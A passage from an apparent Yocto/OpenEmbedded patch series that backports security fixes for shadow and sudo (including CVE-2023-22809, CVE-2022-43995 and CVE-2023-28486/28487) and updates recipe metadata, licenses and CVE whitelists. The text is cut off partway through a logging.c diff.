124Cc: Andreas Jaeger <aj@suse.de>
125Cc: <~hallyn/shadow@lists.sr.ht>
126Signed-off-by: Alejandro Colomar <alx@kernel.org>
127Signed-off-by: Hugo SIMELIERE <hsimeliere.opensource@witekio.com>
128---
129 src/gpasswd.c | 1 +
130 1 file changed, 1 insertion(+)
131
132diff --git a/src/gpasswd.c b/src/gpasswd.c
133index 4d75af96..a698b32a 100644
134--- a/src/gpasswd.c
135+++ b/src/gpasswd.c
136@@ -918,6 +918,7 @@ static void change_passwd (struct group *gr)
137 strzero (cp);
138 cp = getpass (_("Re-enter new password: "));
139 if (NULL == cp) {
140+ memzero (pass, sizeof pass);
141 exit (1);
142 }
143
144--
1452.42.0
146
diff --git a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
index 5f7ea00bf1..4e68f826c6 100644
--- a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
+++ b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
@@ -2,7 +2,7 @@ SUMMARY = "Shadow utils requirements for useradd.bbclass"
2HOMEPAGE = "http://github.com/shadow-maint/shadow" 2HOMEPAGE = "http://github.com/shadow-maint/shadow"
3BUGTRACKER = "http://github.com/shadow-maint/shadow/issues" 3BUGTRACKER = "http://github.com/shadow-maint/shadow/issues"
4SECTION = "base utils" 4SECTION = "base utils"
5LICENSE = "BSD | Artistic-1.0" 5LICENSE = "BSD-3-Clause | Artistic-1.0"
6LIC_FILES_CHKSUM = "file://login.defs_shadow-sysroot;md5=25e2f2de4dfc8f966ac5cdfce45cd7d5" 6LIC_FILES_CHKSUM = "file://login.defs_shadow-sysroot;md5=25e2f2de4dfc8f966ac5cdfce45cd7d5"
7 7
8DEPENDS = "base-passwd" 8DEPENDS = "base-passwd"
diff --git a/meta/recipes-extended/shadow/shadow.inc b/meta/recipes-extended/shadow/shadow.inc
index f86e5e03c0..c16292c38a 100644
--- a/meta/recipes-extended/shadow/shadow.inc
+++ b/meta/recipes-extended/shadow/shadow.inc
@@ -1,8 +1,9 @@
1SUMMARY = "Tools to change and administer password and group data" 1SUMMARY = "Tools to change and administer password and group data"
2HOMEPAGE = "http://github.com/shadow-maint/shadow" 2HOMEPAGE = "http://github.com/shadow-maint/shadow"
3DESCRIPTION = "${SUMMARY}"
3BUGTRACKER = "http://github.com/shadow-maint/shadow/issues" 4BUGTRACKER = "http://github.com/shadow-maint/shadow/issues"
4SECTION = "base/utils" 5SECTION = "base/utils"
5LICENSE = "BSD | Artistic-1.0" 6LICENSE = "BSD-3-Clause | Artistic-1.0"
6LIC_FILES_CHKSUM = "file://COPYING;md5=ed80ff1c2b40843cf5768e5229cf16e5 \ 7LIC_FILES_CHKSUM = "file://COPYING;md5=ed80ff1c2b40843cf5768e5229cf16e5 \
7 file://src/passwd.c;beginline=2;endline=30;md5=5720ff729a6ff39ecc9f64555d75f4af" 8 file://src/passwd.c;beginline=2;endline=30;md5=5720ff729a6ff39ecc9f64555d75f4af"
8 9
@@ -13,6 +14,9 @@ SRC_URI = "https://github.com/shadow-maint/shadow/releases/download/${PV}/${BP}.
13 file://shadow-4.1.3-dots-in-usernames.patch \ 14 file://shadow-4.1.3-dots-in-usernames.patch \
14 ${@bb.utils.contains('PACKAGECONFIG', 'pam', '${PAM_SRC_URI}', '', d)} \ 15 ${@bb.utils.contains('PACKAGECONFIG', 'pam', '${PAM_SRC_URI}', '', d)} \
15 file://shadow-relaxed-usernames.patch \ 16 file://shadow-relaxed-usernames.patch \
17 file://CVE-2023-29383.patch \
18 file://0001-Overhaul-valid_field.patch \
19 file://CVE-2023-4641.patch \
16 " 20 "
17 21
18SRC_URI_append_class-target = " \ 22SRC_URI_append_class-target = " \
diff --git a/meta/recipes-extended/shadow/shadow_4.8.1.bb b/meta/recipes-extended/shadow/shadow_4.8.1.bb
index c975395ff8..9dfcd4bc10 100644
--- a/meta/recipes-extended/shadow/shadow_4.8.1.bb
+++ b/meta/recipes-extended/shadow/shadow_4.8.1.bb
@@ -6,5 +6,10 @@ BUILD_LDFLAGS_append_class-target = " ${@bb.utils.contains('DISTRO_FEATURES', 'p
6 6
7BBCLASSEXTEND = "native nativesdk" 7BBCLASSEXTEND = "native nativesdk"
8 8
9# Severity is low and marked as closed and won't fix.
10# https://bugzilla.redhat.com/show_bug.cgi?id=884658
11CVE_CHECK_WHITELIST += "CVE-2013-4235"
9 12
13# This is an issue for a different shadow
14CVE_CHECK_WHITELIST += "CVE-2016-15024"
10 15
diff --git a/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch
new file mode 100644
index 0000000000..9dfca0441b
--- /dev/null
+++ b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch
@@ -0,0 +1,26 @@
1From 2386cd8f907b379ae5cc1ce2888abef7d30e709a Mon Sep 17 00:00:00 2001
2From: Alexander Kanavin <alex@linutronix.de>
3Date: Sat, 23 Oct 2021 20:20:59 +0200
4Subject: [PATCH] Makefile: do not write the timestamp into compressed manpage.
5
6This helps reproducibility.
7
8Upstream-Status: Submitted [https://github.com/ColinIanKing/stress-ng/pull/156]
9Signed-off-by: Alexander Kanavin <alex@linutronix.de>
10---
11 Makefile | 2 +-
12 1 file changed, 1 insertion(+), 1 deletion(-)
13
14diff --git a/Makefile b/Makefile
15index 886018f9..f4290f9c 100644
16--- a/Makefile
17+++ b/Makefile
18@@ -412,7 +412,7 @@ git-commit-id.h:
19 $(OBJS): stress-ng.h Makefile
20
21 stress-ng.1.gz: stress-ng.1
22- gzip -c $< > $@
23+ gzip -n -c $< > $@
24
25 .PHONY: dist
26 dist:
diff --git a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
index 9b987c7bde..cf94e0275b 100644
--- a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
+++ b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
@@ -5,11 +5,12 @@ HOMEPAGE = "https://kernel.ubuntu.com/~cking/stress-ng/"
5LICENSE = "GPLv2" 5LICENSE = "GPLv2"
6LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" 6LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
7 7
8SRC_URI = "https://kernel.ubuntu.com/~cking/tarballs/${BPN}/${BP}.tar.xz \ 8SRC_URI = "git://github.com/ColinIanKing/stress-ng.git;protocol=https;branch=master \
9 file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \ 9 file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \
10 file://0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch \
10 " 11 "
11SRC_URI[md5sum] = "7b89157c838f2bb4bdeba8f46e3c56ae" 12SRCREV = "e045bcd711178c11b7e797ef6b4c524658468596"
12SRC_URI[sha256sum] = "860291dd3a18b985b3483190a627bbede2b5c52113766c1921001b3fb4b83af0" 13S = "${WORKDIR}/git"
13 14
14DEPENDS = "coreutils-native" 15DEPENDS = "coreutils-native"
15 16
diff --git a/meta/recipes-extended/sudo/files/CVE-2023-22809.patch b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch
new file mode 100644
index 0000000000..6c47eb3e44
--- /dev/null
+++ b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch
@@ -0,0 +1,113 @@
1Backport of:
2
3# HG changeset patch
4# Parent 7275148cad1f8cd3c350026460acc4d6ad349c3a
5sudoedit: do not permit editor arguments to include "--"
6We use "--" to separate the editor and arguments from the files to edit.
7If the editor arguments include "--", sudo can be tricked into allowing
8the user to edit a file not permitted by the security policy.
9Thanks to Matthieu Barjole and Victor Cutillas of Synacktiv
10(https://synacktiv.com) for finding this bug.
11
12CVE: CVE-2023-22809
13Upstream-Staus: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.8.31-1ubuntu1.4.debian.tar.xz]
14Signed-off-by: Omkar Patil <omkar.patil@kpit.com>
15
16--- a/plugins/sudoers/editor.c
17+++ b/plugins/sudoers/editor.c
18@@ -56,7 +56,7 @@ resolve_editor(const char *ed, size_t ed
19 const char *cp, *ep, *tmp;
20 const char *edend = ed + edlen;
21 struct stat user_editor_sb;
22- int nargc;
23+ int nargc = 0;
24 debug_decl(resolve_editor, SUDOERS_DEBUG_UTIL)
25
26 /*
27@@ -102,6 +102,21 @@ resolve_editor(const char *ed, size_t ed
28 free(editor_path);
29 while (nargc--)
30 free(nargv[nargc]);
31+ free(nargv);
32+ debug_return_str(NULL);
33+ }
34+
35+ /*
36+ * We use "--" to separate the editor and arguments from the files
37+ * to edit. The editor arguments themselves may not contain "--".
38+ */
39+ if (strcmp(nargv[nargc], "--") == 0) {
40+ sudo_warnx(U_("ignoring editor: %.*s"), (int)edlen, ed);
41+ sudo_warnx("%s", U_("editor arguments may not contain \"--\""));
42+ errno = EINVAL;
43+ free(editor_path);
44+ while (nargc--)
45+ free(nargv[nargc]);
46 free(nargv);
47 debug_return_str(NULL);
48 }
49--- a/plugins/sudoers/sudoers.c
50+++ b/plugins/sudoers/sudoers.c
51@@ -616,20 +616,31 @@ sudoers_policy_main(int argc, char * con
52
53 /* Note: must call audit before uid change. */
54 if (ISSET(sudo_mode, MODE_EDIT)) {
55+ const char *env_editor = NULL;
56 int edit_argc;
57- const char *env_editor;
58
59 free(safe_cmnd);
60 safe_cmnd = find_editor(NewArgc - 1, NewArgv + 1, &edit_argc,
61 &edit_argv, NULL, &env_editor, false);
62 if (safe_cmnd == NULL) {
63- if (errno != ENOENT)
64+ switch (errno) {
65+ case ENOENT:
66+ audit_failure(NewArgc, NewArgv, N_("%s: command not found"),
67+ env_editor ? env_editor : def_editor);
68+ sudo_warnx(U_("%s: command not found"),
69+ env_editor ? env_editor : def_editor);
70+ goto bad;
71+ case EINVAL:
72+ if (def_env_editor && env_editor != NULL) {
73+ /* User tried to do something funny with the editor. */
74+ log_warningx(SLOG_NO_STDERR|SLOG_SEND_MAIL,
75+ "invalid user-specified editor: %s", env_editor);
76+ goto bad;
77+ }
78+ /* FALLTHROUGH */
79+ default:
80 goto done;
81- audit_failure(NewArgc, NewArgv, N_("%s: command not found"),
82- env_editor ? env_editor : def_editor);
83- sudo_warnx(U_("%s: command not found"),
84- env_editor ? env_editor : def_editor);
85- goto bad;
86+ }
87 }
88 if (audit_success(edit_argc, edit_argv) != 0 && !def_ignore_audit_errors)
89 goto done;
90--- a/plugins/sudoers/visudo.c
91+++ b/plugins/sudoers/visudo.c
92@@ -308,7 +308,7 @@ static char *
93 get_editor(int *editor_argc, char ***editor_argv)
94 {
95 char *editor_path = NULL, **whitelist = NULL;
96- const char *env_editor;
97+ const char *env_editor = NULL;
98 static char *files[] = { "+1", "sudoers" };
99 unsigned int whitelist_len = 0;
100 debug_decl(get_editor, SUDOERS_DEBUG_UTIL)
101@@ -342,7 +342,11 @@ get_editor(int *editor_argc, char ***edi
102 if (editor_path == NULL) {
103 if (def_env_editor && env_editor != NULL) {
104 /* We are honoring $EDITOR so this is a fatal error. */
105- sudo_fatalx(U_("specified editor (%s) doesn't exist"), env_editor);
106+ if (errno == ENOENT) {
107+ sudo_warnx(U_("specified editor (%s) doesn't exist"),
108+ env_editor);
109+ }
110+ exit(EXIT_FAILURE);
111 }
112 sudo_fatalx(U_("no editor found (editor path = %s)"), def_editor);
113 }
diff --git a/meta/recipes-extended/sudo/sudo.inc b/meta/recipes-extended/sudo/sudo.inc
index aeedfc1a23..9c7279d25a 100644
--- a/meta/recipes-extended/sudo/sudo.inc
+++ b/meta/recipes-extended/sudo/sudo.inc
@@ -3,7 +3,7 @@ DESCRIPTION = "Sudo (superuser do) allows a system administrator to give certain
3HOMEPAGE = "http://www.sudo.ws" 3HOMEPAGE = "http://www.sudo.ws"
4BUGTRACKER = "http://www.sudo.ws/bugs/" 4BUGTRACKER = "http://www.sudo.ws/bugs/"
5SECTION = "admin" 5SECTION = "admin"
6LICENSE = "ISC & BSD & Zlib" 6LICENSE = "ISC & BSD-3-Clause & BSD-2-Clause & Zlib"
7LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=07966675feaddba70cc812895b248230 \ 7LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=07966675feaddba70cc812895b248230 \
8 file://plugins/sudoers/redblack.c;beginline=1;endline=46;md5=03e35317699ba00b496251e0dfe9f109 \ 8 file://plugins/sudoers/redblack.c;beginline=1;endline=46;md5=03e35317699ba00b496251e0dfe9f109 \
9 file://lib/util/reallocarray.c;beginline=3;endline=15;md5=397dd45c7683e90b9f8bf24638cf03bf \ 9 file://lib/util/reallocarray.c;beginline=3;endline=15;md5=397dd45c7683e90b9f8bf24638cf03bf \
@@ -49,3 +49,5 @@ do_compile_prepend () {
49do_install_prepend (){ 49do_install_prepend (){
50 mkdir -p ${D}/${localstatedir}/lib 50 mkdir -p ${D}/${localstatedir}/lib
51} 51}
52
53CVE_VERSION_SUFFIX = "patch"
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch
new file mode 100644
index 0000000000..1336c7701d
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch
@@ -0,0 +1,59 @@
1From e1554d7996a59bf69544f3d8dd4ae683027948f9 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Tue, 15 Nov 2022 09:17:18 +0530
4Subject: [PATCH] CVE-2022-43995
5
6Upstream-Status: Backport [https://github.com/sudo-project/sudo/commit/bd209b9f16fcd1270c13db27ae3329c677d48050]
7CVE: CVE-2022-43995
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10Potential heap overflow for passwords < 8
11characters. Starting with sudo 1.8.0 the plaintext password buffer is
12dynamically sized so it is not safe to assume that it is at least 9 bytes in
13size.
14Found by Hugo Lefeuvre (University of Manchester) with ConfFuzz.
15---
16 plugins/sudoers/auth/passwd.c | 11 +++++------
17 1 file changed, 5 insertions(+), 6 deletions(-)
18
19diff --git a/plugins/sudoers/auth/passwd.c b/plugins/sudoers/auth/passwd.c
20index 03c7a16..76a7824 100644
21--- a/plugins/sudoers/auth/passwd.c
22+++ b/plugins/sudoers/auth/passwd.c
23@@ -63,7 +63,7 @@ sudo_passwd_init(struct passwd *pw, sudo_auth *auth)
24 int
25 sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_conv_callback *callback)
26 {
27- char sav, *epass;
28+ char des_pass[9], *epass;
29 char *pw_epasswd = auth->data;
30 size_t pw_len;
31 int matched = 0;
32@@ -75,12 +75,12 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c
33
34 /*
35 * Truncate to 8 chars if standard DES since not all crypt()'s do this.
36- * If this turns out not to be safe we will have to use OS #ifdef's (sigh).
37 */
38- sav = pass[8];
39 pw_len = strlen(pw_epasswd);
40- if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len))
41- pass[8] = '\0';
42+ if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len)) {
43+ strlcpy(des_pass, pass, sizeof(des_pass));
44+ pass = des_pass;
45+ }
46
47 /*
48 * Normal UN*X password check.
49@@ -88,7 +88,6 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c
50 * only compare the first DESLEN characters in that case.
51 */
52 epass = (char *) crypt(pass, pw_epasswd);
53- pass[8] = sav;
54 if (epass != NULL) {
55 if (HAS_AGEINFO(pw_epasswd, pw_len) && strlen(epass) == DESLEN)
56 matched = !strncmp(pw_epasswd, epass, DESLEN);
57--
582.25.1
59
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch
new file mode 100644
index 0000000000..bc6f8c19a6
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch
@@ -0,0 +1,646 @@
1Origin: Backport obtained from SUSE. Thanks!
2
3From 334daf92b31b79ce68ed75e2ee14fca265f029ca Mon Sep 17 00:00:00 2001
4From: "Todd C. Miller" <Todd.Miller@sudo.ws>
5Date: Wed, 18 Jan 2023 08:21:34 -0700
6Subject: [PATCH] Escape control characters in log messages and "sudoreplay -l"
7 output. The log message contains user-controlled strings that could include
8 things like terminal control characters. Space characters in the command
9 path are now also escaped.
10
11Command line arguments that contain spaces are surrounded with
12single quotes and any literal single quote or backslash characters
13are escaped with a backslash. This makes it possible to distinguish
14multiple command line arguments from a single argument that contains
15spaces.
16
17Issue found by Matthieu Barjole and Victor Cutillas of Synacktiv
18(https://synacktiv.com).
19
20Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-1.patch?h=ubuntu/focal-security
21Upstream commit https://github.com/sudo-project/sudo/commit/334daf92b31b79ce68ed75e2ee14fca265f029ca]
22CVE: CVE-2023-28486 CVE-2023-28487
23Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
24---
25 doc/sudoers.man.in | 33 +++++++--
26 doc/sudoers.mdoc.in | 28 ++++++--
27 doc/sudoreplay.man.in | 9 ++
28 doc/sudoreplay.mdoc.in | 10 ++
29 include/sudo_compat.h | 6 +
30 include/sudo_lbuf.h | 7 ++
31 lib/util/lbuf.c | 106 +++++++++++++++++++++++++++++++
32 lib/util/util.exp.in | 1
33 plugins/sudoers/logging.c | 145 +++++++++++--------------------------------
34 plugins/sudoers/sudoreplay.c | 44 +++++++++----
35 10 files changed, 257 insertions(+), 132 deletions(-)
36
37--- a/doc/sudoers.man.in
38+++ b/doc/sudoers.man.in
39@@ -4566,6 +4566,19 @@ can log events using either
40 syslog(3)
41 or a simple log file.
42 The log format is almost identical in both cases.
43+Any control characters present in the log data are formatted in octal
44+with a leading
45+\(oq#\(cq
46+character.
47+For example, a horizontal tab is stored as
48+\(oq#011\(cq
49+and an embedded carriage return is stored as
50+\(oq#015\(cq.
51+In addition, space characters in the command path are stored as
52+\(oq#040\(cq.
53+Literal single quotes and backslash characters
54+(\(oq\e\(cq)
55+in command line arguments are escaped with a backslash.
56 .SS "Accepted command log entries"
57 Commands that sudo runs are logged using the following format (split
58 into multiple lines for readability):
59@@ -4646,7 +4659,7 @@ A list of environment variables specifie
60 if specified.
61 .TP 14n
62 command
63-The actual command that was executed.
64+The actual command that was executed, including any command line arguments.
65 .PP
66 Messages are logged using the locale specified by
67 \fIsudoers_locale\fR,
68@@ -4882,17 +4895,21 @@ with a few important differences:
69 1.\&
70 The
71 \fIprogname\fR
72-and
73-\fIhostname\fR
74-fields are not present.
75+field is not present.
76 .TP 5n
77 2.\&
78-If the
79-\fIlog_year\fR
80-option is enabled,
81-the date will also include the year.
82+The
83+\fIhostname\fR
84+is only logged if the
85+\fIlog_host\fR
86+option is enabled.
87 .TP 5n
88 3.\&
89+The date does not include the year unless the
90+\fIlog_year\fR
91+option is enabled.
92+.TP 5n
93+4.\&
94 Lines that are longer than
95 \fIloglinelen\fR
96 characters (80 by default) are word-wrapped and continued on the
97--- a/doc/sudoers.mdoc.in
98+++ b/doc/sudoers.mdoc.in
99@@ -4261,6 +4261,19 @@ can log events using either
100 .Xr syslog 3
101 or a simple log file.
102 The log format is almost identical in both cases.
103+Any control characters present in the log data are formatted in octal
104+with a leading
105+.Ql #
106+character.
107+For example, a horizontal tab is stored as
108+.Ql #011
109+and an embedded carriage return is stored as
110+.Ql #015 .
111+In addition, space characters in the command path are stored as
112+.Ql #040 .
113+Literal single quotes and backslash characters
114+.Pq Ql \e
115+in command line arguments are escaped with a backslash.
116 .Ss Accepted command log entries
117 Commands that sudo runs are logged using the following format (split
118 into multiple lines for readability):
119@@ -4328,7 +4341,7 @@ option is enabled.
120 A list of environment variables specified on the command line,
121 if specified.
122 .It command
123-The actual command that was executed.
124+The actual command that was executed, including any command line arguments.
125 .El
126 .Pp
127 Messages are logged using the locale specified by
128@@ -4550,14 +4563,17 @@ with a few important differences:
129 .It
130 The
131 .Em progname
132-and
133+field is not present.
134+.It
135+The
136 .Em hostname
137-fields are not present.
138+is only logged if the
139+.Em log_host
140+option is enabled.
141 .It
142-If the
143+The date does not include the year unless the
144 .Em log_year
145-option is enabled,
146-the date will also include the year.
147+option is enabled.
148 .It
149 Lines that are longer than
150 .Em loglinelen
151--- a/doc/sudoreplay.man.in
152+++ b/doc/sudoreplay.man.in
153@@ -149,6 +149,15 @@ In this mode,
154 will list available sessions in a format similar to the
155 \fBsudo\fR
156 log file format, sorted by file name (or sequence number).
157+Any control characters present in the log data are formated in octal
158+with a leading
159+\(oq#\(cq
160+character.
161+For example, a horizontal tab is displayed as
162+\(oq#011\(cq
163+and an embedded carriage return is displayed as
164+\(oq#015\(cq.
165+.sp
166 If a
167 \fIsearch expression\fR
168 is specified, it will be used to restrict the IDs that are displayed.
169--- a/doc/sudoreplay.mdoc.in
170+++ b/doc/sudoreplay.mdoc.in
171@@ -142,6 +142,16 @@ In this mode,
172 will list available sessions in a format similar to the
173 .Nm sudo
174 log file format, sorted by file name (or sequence number).
175+Any control characters present in the log data are formatted in octal
176+with a leading
177+.Ql #
178+character.
179+For example, a horizontal tab is displayed as
180+.Ql #011
181+and an embedded carriage return is displayed as
182+.Ql #015 .
183+Space characters in the command name and arguments are also formatted in octal.
184+.Pp
185 If a
186 .Ar search expression
187 is specified, it will be used to restrict the IDs that are displayed.
188--- a/include/sudo_compat.h
189+++ b/include/sudo_compat.h
190@@ -79,6 +79,12 @@
191 # endif
192 #endif
193
194+#ifdef HAVE_FALLTHROUGH_ATTRIBUTE
195+# define FALLTHROUGH __attribute__((__fallthrough__))
196+#else
197+# define FALLTHROUGH do { } while (0)
198+#endif
199+
200 /*
201 * Given the pointer x to the member m of the struct s, return
202 * a pointer to the containing structure.
203--- a/include/sudo_lbuf.h
204+++ b/include/sudo_lbuf.h
205@@ -36,9 +36,15 @@ struct sudo_lbuf {
206
207 typedef int (*sudo_lbuf_output_t)(const char *);
208
209+/* Flags for sudo_lbuf_append_esc() */
210+#define LBUF_ESC_CNTRL 0x01
211+#define LBUF_ESC_BLANK 0x02
212+#define LBUF_ESC_QUOTE 0x04
213+
214 __dso_public void sudo_lbuf_init_v1(struct sudo_lbuf *lbuf, sudo_lbuf_output_t output, int indent, const char *continuation, int cols);
215 __dso_public void sudo_lbuf_destroy_v1(struct sudo_lbuf *lbuf);
216 __dso_public bool sudo_lbuf_append_v1(struct sudo_lbuf *lbuf, const char *fmt, ...) __printflike(2, 3);
217+__dso_public bool sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...) __printflike(3, 4);
218 __dso_public bool sudo_lbuf_append_quoted_v1(struct sudo_lbuf *lbuf, const char *set, const char *fmt, ...) __printflike(3, 4);
219 __dso_public void sudo_lbuf_print_v1(struct sudo_lbuf *lbuf);
220 __dso_public bool sudo_lbuf_error_v1(struct sudo_lbuf *lbuf);
221@@ -47,6 +53,7 @@ __dso_public void sudo_lbuf_clearerr_v1(
222 #define sudo_lbuf_init(_a, _b, _c, _d, _e) sudo_lbuf_init_v1((_a), (_b), (_c), (_d), (_e))
223 #define sudo_lbuf_destroy(_a) sudo_lbuf_destroy_v1((_a))
224 #define sudo_lbuf_append sudo_lbuf_append_v1
225+#define sudo_lbuf_append_esc sudo_lbuf_append_esc_v1
226 #define sudo_lbuf_append_quoted sudo_lbuf_append_quoted_v1
227 #define sudo_lbuf_print(_a) sudo_lbuf_print_v1((_a))
228 #define sudo_lbuf_error(_a) sudo_lbuf_error_v1((_a))
229--- a/lib/util/lbuf.c
230+++ b/lib/util/lbuf.c
231@@ -93,6 +93,112 @@ sudo_lbuf_expand(struct sudo_lbuf *lbuf,
232 }
233
234 /*
235+ * Escape a character in octal form (#0n) and store it as a string
236+ * in buf, which must have at least 6 bytes available.
237+ * Returns the length of buf, not counting the terminating NUL byte.
238+ */
239+static int
240+escape(unsigned char ch, char *buf)
241+{
242+ const int len = ch < 0100 ? (ch < 010 ? 3 : 4) : 5;
243+
244+ /* Work backwards from the least significant digit to most significant. */
245+ switch (len) {
246+ case 5:
247+ buf[4] = (ch & 7) + '0';
248+ ch >>= 3;
249+ FALLTHROUGH;
250+ case 4:
251+ buf[3] = (ch & 7) + '0';
252+ ch >>= 3;
253+ FALLTHROUGH;
254+ case 3:
255+ buf[2] = (ch & 7) + '0';
256+ buf[1] = '0';
257+ buf[0] = '#';
258+ break;
259+ }
260+ buf[len] = '\0';
261+
262+ return len;
263+}
264+
265+/*
266+ * Parse the format and append strings, only %s and %% escapes are supported.
267+ * Any non-printable characters are escaped in octal as #0nn.
268+ */
269+bool
270+sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...)
271+{
272+ unsigned int saved_len = lbuf->len;
273+ bool ret = false;
274+ const char *s;
275+ va_list ap;
276+ debug_decl(sudo_lbuf_append_esc, SUDO_DEBUG_UTIL);
277+
278+ if (sudo_lbuf_error(lbuf))
279+ debug_return_bool(false);
280+
281+#define should_escape(ch) \
282+ ((ISSET(flags, LBUF_ESC_CNTRL) && iscntrl((unsigned char)ch)) || \
283+ (ISSET(flags, LBUF_ESC_BLANK) && isblank((unsigned char)ch)))
284+#define should_quote(ch) \
285+ (ISSET(flags, LBUF_ESC_QUOTE) && (ch == '\'' || ch == '\\'))
286+
287+ va_start(ap, fmt);
288+ while (*fmt != '\0') {
289+ if (fmt[0] == '%' && fmt[1] == 's') {
290+ if ((s = va_arg(ap, char *)) == NULL)
291+ s = "(NULL)";
292+ while (*s != '\0') {
293+ if (should_escape(*s)) {
294+ if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1))
295+ goto done;
296+ lbuf->len += escape(*s++, lbuf->buf + lbuf->len);
297+ continue;
298+ }
299+ if (should_quote(*s)) {
300+ if (!sudo_lbuf_expand(lbuf, 2))
301+ goto done;
302+ lbuf->buf[lbuf->len++] = '\\';
303+ lbuf->buf[lbuf->len++] = *s++;
304+ continue;
305+ }
306+ if (!sudo_lbuf_expand(lbuf, 1))
307+ goto done;
308+ lbuf->buf[lbuf->len++] = *s++;
309+ }
310+ fmt += 2;
311+ continue;
312+ }
313+ if (should_escape(*fmt)) {
314+ if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1))
315+ goto done;
316+ if (*fmt == '\'') {
317+ lbuf->buf[lbuf->len++] = '\\';
318+ lbuf->buf[lbuf->len++] = *fmt++;
319+ } else {
320+ lbuf->len += escape(*fmt++, lbuf->buf + lbuf->len);
321+ }
322+ continue;
323+ }
324+ if (!sudo_lbuf_expand(lbuf, 1))
325+ goto done;
326+ lbuf->buf[lbuf->len++] = *fmt++;
327+ }
328+ ret = true;
329+
330+done:
331+ if (!ret)
332+ lbuf->len = saved_len;
333+ if (lbuf->size != 0)
334+ lbuf->buf[lbuf->len] = '\0';
335+ va_end(ap);
336+
337+ debug_return_bool(ret);
338+}
339+
340+/*
341 * Parse the format and append strings, only %s and %% escapes are supported.
342 * Any characters in set are quoted with a backslash.
343 */
344--- a/lib/util/util.exp.in
345+++ b/lib/util/util.exp.in
346@@ -79,6 +79,7 @@ sudo_gethostname_v1
347 sudo_gettime_awake_v1
348 sudo_gettime_mono_v1
349 sudo_gettime_real_v1
350+sudo_lbuf_append_esc_v1
351 sudo_lbuf_append_quoted_v1
352 sudo_lbuf_append_v1
353 sudo_lbuf_clearerr_v1
354--- a/plugins/sudoers/logging.c
355+++ b/plugins/sudoers/logging.c
356@@ -58,6 +58,7 @@
357 #include <syslog.h>
358
359 #include "sudoers.h"
360+#include "sudo_lbuf.h"
361
362 #ifndef HAVE_GETADDRINFO
363 # include "compat/getaddrinfo.h"
364@@ -940,14 +941,6 @@ should_mail(int status)
365 (def_mail_no_perms && !ISSET(status, VALIDATE_SUCCESS)));
366 }
367
368-#define LL_TTY_STR "TTY="
369-#define LL_CWD_STR "PWD=" /* XXX - should be CWD= */
370-#define LL_USER_STR "USER="
371-#define LL_GROUP_STR "GROUP="
372-#define LL_ENV_STR "ENV="
373-#define LL_CMND_STR "COMMAND="
374-#define LL_TSID_STR "TSID="
375-
376 #define IS_SESSID(s) ( \
377 isalnum((unsigned char)(s)[0]) && isalnum((unsigned char)(s)[1]) && \
378 (s)[2] == '/' && \
379@@ -962,14 +955,16 @@ should_mail(int status)
380 static char *
381 new_logline(const char *message, const char *errstr)
382 {
383- char *line = NULL, *evstr = NULL;
384 #ifndef SUDOERS_NO_SEQ
385 char sessid[7];
386 #endif
387 const char *tsid = NULL;
388- size_t len = 0;
389+ struct sudo_lbuf lbuf;
390+ int i;
391 debug_decl(new_logline, SUDOERS_DEBUG_LOGGING)
392
393+ sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0);
394+
395 #ifndef SUDOERS_NO_SEQ
396 /* A TSID may be a sudoers-style session ID or a free-form string. */
397 if (sudo_user.iolog_file != NULL) {
398@@ -989,119 +984,55 @@ new_logline(const char *message, const c
399 #endif
400
401 /*
402- * Compute line length
403+ * Format the log line as an lbuf, escaping control characters in
404+ * octal form (#0nn). Error checking (ENOMEM) is done at the end.
405 */
406- if (message != NULL)
407- len += strlen(message) + 3;
408- if (errstr != NULL)
409- len += strlen(errstr) + 3;
410- len += sizeof(LL_TTY_STR) + 2 + strlen(user_tty);
